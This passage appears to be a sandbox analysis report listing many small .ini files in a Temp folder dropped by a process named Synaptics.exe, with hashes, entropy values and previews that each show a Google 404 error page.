                                                                                                                                                                                        SSDEEP:24:bsF+007LzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+l+pAZewRDK4mW
                                                                                                                                                                                        MD5:CE480FAAF6A11264A28EE187C4C48B28
                                                                                                                                                                                        SHA1:6E6F49D363F4A8F479D6566A94392AF5B9A433A3
                                                                                                                                                                                        SHA-256:0B90CAACB2DEEABC03056CD39FDDAC0D2A14C254BB010CEBF629A4F2B99A9DB4
                                                                                                                                                                                        SHA-512:3E0A115D11F5A4A1567EA70AA251495E26A2121735C525E7444044900CBB7A747836AAE7B3898E209B04986FB9C81A7A2D09B19DC0CF2A3709A1A58812738BD9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0mxE4E3YwqLTTgeaIzt0Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\31JDzDG.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.264782017057282
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+3+pAZewRDK4mW
                                                                                                                                                                                        MD5:D14AC6025DACA5A44FF0DD0FC9465BA7
                                                                                                                                                                                        SHA1:015CA036941FA8A4E53DF478E1FEBA05930A4516
                                                                                                                                                                                        SHA-256:2EB1BC0A884995C815B869E81A7F2DF6788C070909037D19DD5BE31A165A3255
                                                                                                                                                                                        SHA-512:7504C1368CA0C9DBA69CF6DB24653EC2681AFD3E2A1EFB3EEE38467A94F5BBA623C77E8D4E68CC72C5B09AF0E5C2B2EE4202186FED635E9C3B93B4C62B317C25
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CRlyF0iU8tY5TH87YUHmvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\33tBhAN.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.254327196448261
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0B2bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK++M+pAZewRDK4mW
                                                                                                                                                                                        MD5:65D6E6DDA1B6165D56404C84CA88BBCD
                                                                                                                                                                                        SHA1:80F4004FFF1ADC4D2BF72AD0A59B8C614F87F86B
                                                                                                                                                                                        SHA-256:34D0DA4E9A1B5B50FF8E4ED7239026281BFB024418FEB93604C7C9916FC0304F
                                                                                                                                                                                        SHA-512:A90A752FFF0F64D0EB10412B5F2C354BB9A84CA3018F6334603F957898E005B7F24E566837757606BCF7727D58511E6F5A1A45644D45818A660A19E573751E5F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6frFwDesl4OFCpUqQsyp0w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\38MXrWw.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.277700061677758
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0sSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+n+pAZewRDK4mW
                                                                                                                                                                                        MD5:9B15E1C851520C7E4A01CD77566E4A57
                                                                                                                                                                                        SHA1:FDDDB203DDF8C763F40A23CB8EDC2896A4E6365C
                                                                                                                                                                                        SHA-256:1DCA93B44B264D27F870FF5CE33769FB8588E781862F6EDA03A626727F08AB95
                                                                                                                                                                                        SHA-512:25335C5A27D7CDBA871423FD3B7BA8BBB206A473080C5FA479E59EF6D11FD41BB1541A55ACE5F939E3BEAC4B58DB774B6A28126227322ECC8C9C35491F4FD312
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SKZR3NjH7jv6dywUYKIigQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\41ZCYok.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25348814907972
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+k+pAZewRDK4mW
                                                                                                                                                                                        MD5:5236EE8AB16E76F1C3334370A37DE986
                                                                                                                                                                                        SHA1:98A3E8343C18DF83200E0C623E97941CBA13829C
                                                                                                                                                                                        SHA-256:CEB815FEBCE9948AF516554D930E0461867F35E88C5BA45CF79A5317D529AB3F
                                                                                                                                                                                        SHA-512:613067C5712007A4E7AFF4730635E6C01615078F72C45CFB02170FFB792ECC36FF42E8C21D7ADE156651E7B9E515858B7E1E1AAB31EA16217B9BC7C028D0BF70
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zh90wI7Jk7nXht9nQgcJaA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4OJiF2Y.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2566320598839615
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+L+pAZewRDK4mW
                                                                                                                                                                                        MD5:BC3F89549E3A1A7CC0DC9BEE7A7E11F1
                                                                                                                                                                                        SHA1:66C6807D68658781406C7F494933D1FEAC90E1AF
                                                                                                                                                                                        SHA-256:DED6D701C04D4CCFD759CDDA5F8DF124869F6EE46514BCB1C4F9B3D855D4D4F9
                                                                                                                                                                                        SHA-512:8F63F6ADDEECBB1A3C065301D2DCDA28B863497DB98C1E95A1D4C915DEDF6A883573ABD87F0FAD9252A2A1580E5E4E7AFF44D608AFC548675DD324DFADF4F20D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yMai7JX4lBy5OV5yLs23lg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4wEhSGm.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.269673899223083
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0rsSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+as+pAZewRDK4mW
                                                                                                                                                                                        MD5:7A9A69BDD9258E9D0C731F19BADD11BC
                                                                                                                                                                                        SHA1:5372EC3983B6EDCA26FF79B633EA51F011C33A4F
                                                                                                                                                                                        SHA-256:06096D733AA4CB8AB5BBAA65487F9816697412DD711A1988BC186E56350591FD
                                                                                                                                                                                        SHA-512:D66436205CFC9A639BD0AEB8BBB7CB686CAAC3E05F9826BE44544C59CE4974D708DD7C0B4026441214B15650B813A2DB9BDEF7D7581937728412DA3A26FF2E19
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="tz8XO6utBZMoHBOs5i8yUQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5TZCb1o.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2638452993538145
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0YoSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+xo+pAZewRDK4mW
                                                                                                                                                                                        MD5:9E60DC241748E209FF2F4D9C3579993F
                                                                                                                                                                                        SHA1:CE7340AF705F26E26C77C7E209F2427A36B9C1F5
                                                                                                                                                                                        SHA-256:CA0FDE11D970A5297329EF9FEEBB39033D203183B487BCF76070FB7194D21E87
                                                                                                                                                                                        SHA-512:12ABA44977A378BEE282BD7E09F4A8101CF3E3A2330E4C9C6E7A412F58424FDA9EDF574B0ADA00A6575344C7A41404DC2404F14F4F7231FD3FCB9AE38B4AF2A2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j35nVxEKE10CdE66zyLyyw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5mU62Vx.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.255743111250052
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                        MD5:43F735CCA67E094DAFDEC106ED352135
                                                                                                                                                                                        SHA1:BCD284C77119CB98FF46AE2CBF0AC8C27B4CF5F4
                                                                                                                                                                                        SHA-256:4365B322FC4834CC881C3E4A94D2700E91A70AE53C86F252897CAAFE8FF19479
                                                                                                                                                                                        SHA-512:9BF8A4209B986D2BFF6C5FC37F25FC47104C4A27052DBF0EE5C7176C842AB92CB2F8CAE1181279748DF7FACD5377FA414A698F1BDC5E72D76EFD0789E0A6FE79
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nlVo1B6m/fQSEieJ1vR3Fg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\5r9VHNU.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.258401373387421
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0XdCbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+kdCb+pAZewRDK4mW
                                                                                                                                                                                        MD5:DB656BB71E759E1204F4ACBA10BC76BC
                                                                                                                                                                                        SHA1:40A120E9B488C356B7291904082144E54490D411
                                                                                                                                                                                        SHA-256:52C3C79C9FBA035EF6CAC0425FDCC575CCC71962C1C78F3B2BD2C9DE2DD37268
                                                                                                                                                                                        SHA-512:5E3FE91F5FC815C7F033D68DBFD7F6A6341C4068F92C7A743D64AD3C508D2A699A68D62BEE56C61022E1F1732FEB8511D3B80293EA2BAF619C4B9BA1CF137160
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="naDg9NH/tvlbN7zYKrtLIA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7iDYyJC.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.265186403756429
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+06SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+d+pAZewRDK4mW
                                                                                                                                                                                        MD5:1A86D2643EAB0A9B8C2DE79F24937236
                                                                                                                                                                                        SHA1:D269AEA20E8998BA357261AE311B0593D46BD7B0
                                                                                                                                                                                        SHA-256:973A14B375F69C8DB36150E4BE98AB05FD45F00F6352FF836A776D40A81C13E6
                                                                                                                                                                                        SHA-512:820E2DEBF5B908CA6EE3FFE3146A391C5227CD079EAC7556A827085B83765FF82C4760C38962D4B16689C0CFDEFA40E3789A8F426C82981626CA34BD2914C8B6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="SAfIwhVEFLLGRrmLx5mUZw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7rRpMDu.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.257306435661986
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
                                                                                                                                                                                        MD5:782FB336E2D19FFFCD4677DA09302E29
                                                                                                                                                                                        SHA1:B6C1356FC77C963F4BDAEA70659531A7E4231B3E
                                                                                                                                                                                        SHA-256:402C76D3AE4BA481CFBC0E712AEA1953C0F5A3521AC049B75C4269C116652775
                                                                                                                                                                                        SHA-512:2DE89B32B5CFE90165451BAC0D792786AABF234D9F74A3E0BF7E368723C177C614EF49BCD8340AE1AB43BE28367DE4EE67732FBD37BFD7FBBDC1D06E2DB6D0C5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UeqF1ZFCzftiRGdEP2eQeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\7wDVPyU.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.257091931296347
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0nwDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ZD+pAZewRDK4mW
                                                                                                                                                                                        MD5:8C4827AE3D701F9A6601ABB848DB7B0C
                                                                                                                                                                                        SHA1:BAE2C809C26B6B1D91EF0FC33BE048291A716355
                                                                                                                                                                                        SHA-256:EE0430887DAA4FCDBC1921E2C9F2928B9CE3A3113074F24A4E4CC2D827E0E2ED
                                                                                                                                                                                        SHA-512:781B838FEBCFF0DC9AC0B790CE08FE920565EF6C8C123310CBDA03AAEE5CC60F14F6CD32500FE34CDC916A2E033BD01705E0415EE39BA695EC29519ABCAF62A1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="d9alory9yFBk2mSTe++OUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\92vmOUB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25926559454254
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0B4bSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+oS+pAZewRDK4mW
                                                                                                                                                                                        MD5:D9C90697D3746033B40B2FC510DE4953
                                                                                                                                                                                        SHA1:D4705E702421E31B3CE744508CF2EFDC1BF5088E
                                                                                                                                                                                        SHA-256:D1317CDFE1A1463DF20090A51380EC7D03B7C0E7B750F118595382DC05CF897F
                                                                                                                                                                                        SHA-512:E2E115C3E99652D117322182EB04DEB207A57ACB274FEECF55D4E8994604BF282600330B5188E3CED3D944C157FD41948B5D1FBFA931DA5B76A8B9481647785B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ubOx9veCJU4hBeKyuZXouw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\9bwvZNX.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
